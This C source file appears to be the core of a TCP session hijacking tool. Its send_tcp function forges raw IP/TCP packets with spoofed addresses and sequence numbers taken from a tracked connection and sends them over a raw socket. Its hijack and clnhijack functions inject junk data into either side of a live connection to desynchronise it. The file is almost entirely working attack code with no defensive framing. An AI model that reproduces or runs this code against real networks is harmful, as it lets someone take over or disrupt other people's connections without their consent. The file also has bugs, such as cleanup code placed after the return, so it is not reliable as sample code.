#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "pkt_struct.h"
#include <stdio.h>
#include <stdlib.h>
#include "hjklib.h"


int send_tcp(struct connection *conn,
	      u_short server,
	      u_short RST,
	      u_short ACK,
	      u_short PSH,
	      u_short FIN,
	      char *data,
	      u_short datalen,
	      int howmany
	     )
{
   
   struct iphdr *pip;
   struct tcphdr *ptcp;
   char *pkt;
   int t_len,s,hdr=1,i;
   struct sockaddr_in dest;
   pkt=(char *)malloc(40+datalen);
   pip=(struct iphdr *)pkt;
   ptcp=(struct tcphdr *)(pkt+20);
   memset(pkt,0, 40 + datalen);
   
   pip->version=4;
   pip->ihl=5;
   pip->tos=0;
   pip->tot_len=htons(40+datalen);
   /* add a random value !! */
   pip->id=12345;
   pip->frag_off=0x40;
   pip->ttl=255;
   pip->protocol=6;
   if(server){
      pip->saddr=conn->src.addr;
      pip->daddr=conn->dst.addr;
      ptcp->source=htons(conn->src.port);
      ptcp->dest=htons(conn->dst.port);
      ptcp->seq=htonl(conn->dst.exp_seq +1 );
      ptcp->ack_seq=htonl(conn->dst.seq);
      conn->dst.exp_seq=conn->dst.exp_seq+datalen;
   }
   else {
      pip->saddr=conn->dst.addr;
      pip->daddr=conn->src.addr;
      ptcp->source=htons(conn->dst.port);
      ptcp->dest=htons(conn->src.port);
      ptcp->seq=htonl(conn->src.exp_seq +1 );
      ptcp->ack_seq=htonl(conn->src.seq);
      conn->src.exp_seq=conn->src.exp_seq+datalen;
   }
   if(RST)ptcp->rst=1;
   if(ACK)ptcp->ack=1;
   if(PSH)ptcp->psh=1;
   if(FIN)ptcp->fin=1;
   ptcp->window=htons(666); /*windows is also used to identify our packets */
   ptcp->doff=(sizeof(struct tcphdr))/4;
   memcpy((void *)(pkt+40),data,datalen);
   
   /* summing */
   pip->check=in_chksum((u_short *)pip,20);
   ptcp->check=trans_check(6,(char *)ptcp,20 +datalen,pip->saddr,pip->daddr);
   s=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
   
   setsockopt(s,IPPROTO_IP,IP_HDRINCL,&hdr,sizeof(hdr));
   dest.sin_addr.s_addr=pip->daddr;
   dest.sin_family=AF_INET;
   for(i=0;i<(howmany-1);i++)
     sendto(s,pkt,40+datalen,0,(struct sockaddr *)&dest,sizeof(struct sockaddr));
   return(sendto(s,pkt,40+datalen,0,(struct sockaddr *)&dest,sizeof(struct sockaddr)));
   free(pkt);
   close(s);
}

void hijack(struct connection *conn){
   char *str;
   str=malloc(1000);
   memset(str,0,1000);
   send_tcp(conn,1,0,1,1,0,str,1000,3);
   conn->hijacked=1;
   free(str);
}

void clnhijack(struct connection *conn){
   char *str;
   str=malloc(1000);
   memset(str,0,1000);
   send_tcp(conn,0,0,1,1,0,str,1000,3);
   conn->hijacked=1;
   free(str);
}
